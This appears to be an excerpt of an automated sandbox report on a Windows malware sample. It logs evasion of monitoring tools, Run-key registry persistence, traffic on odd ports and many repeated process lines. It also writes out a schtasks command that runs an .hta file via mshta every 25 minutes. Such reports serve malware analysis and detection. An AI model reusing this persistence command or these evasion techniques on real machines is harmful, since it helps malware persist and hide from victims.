Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f

Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a59b997485.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a59b997485.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 63758 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 63758
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 63758

Source: C:\Users\user\Desktop\random.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
